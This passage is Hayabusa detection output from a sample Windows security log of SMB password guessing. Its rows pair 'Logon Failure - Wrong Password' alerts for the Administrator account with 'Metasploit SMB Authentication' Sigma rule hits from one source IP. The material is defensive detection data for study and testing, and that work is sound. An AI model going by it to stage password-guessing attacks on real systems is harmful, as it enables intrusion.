SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FydQjBxO7XninU5Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P8InIzyD86BXr1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvKGa3A3qw7s0cZX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QTY7tRVEMjXZXFyH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:50.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m4Ij1NSYGYbq4PxS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 47fOxZAYhjxLzEoU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aGxXaNNChVScbHe6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jTcVeB8f2Rs3Bldo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeSnUlIbuDVNffey : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eXIM4tWru1x0AahJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m2pBLn6aO8L4kiH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.379 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EG5daDsgTMZsNg0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3V8z6j7GLO3ywBXc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.492 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AsezMvhUNedLNqg4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h16AvUVZG8qch7LC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PB5xe3Aieya8N3IU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.687 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezGXIhYrkk2Q9pe5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VSGIVhD6pO5z47DY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2vEjOhJW9G3aIfV0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hyvCpW3aOZqCOldu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyhS2wAAkfmZuLll : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0bEh0KTMbbFtsfck : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:51.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mw9u61efa06vYv6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SAxij8QYLxxriIvu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HK2tbzICSpTrglud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rHJ70VrEwCQjSvL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.176 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qwZT66ExkdJDZaT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ezuHluj1fEC9KdQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bXH5uDfo4WB6QEnQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWvZjuZhnGcrelOM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vb6ePjmpA8ZwK1PW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1A9ZY20WM8oDn6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71GKLnXqSEEuc1Fw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: w0GsW0vDEkpRa1X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0HH6zUUoL0qlfFC2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AG4pYsjob1iwlOc0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.636 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dNCX5tZ0nF1foTLW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vO82Kb0kboVFuJy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DptE2C8ZK3AxCb43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NC8manvVP5pU8F3N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m00bI5welsLUWmwJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4shyxJk2PiH1TDlj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xZyN2WO3UVY0WQs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: oSQjAMckifap5r1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qixqXiX0mVcuXe37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gIfJCJz6l36WMeY9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:53.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SZxv5U7uoN6E8c8E : IP Address: 192.168.198.149 : AuthPackage: 
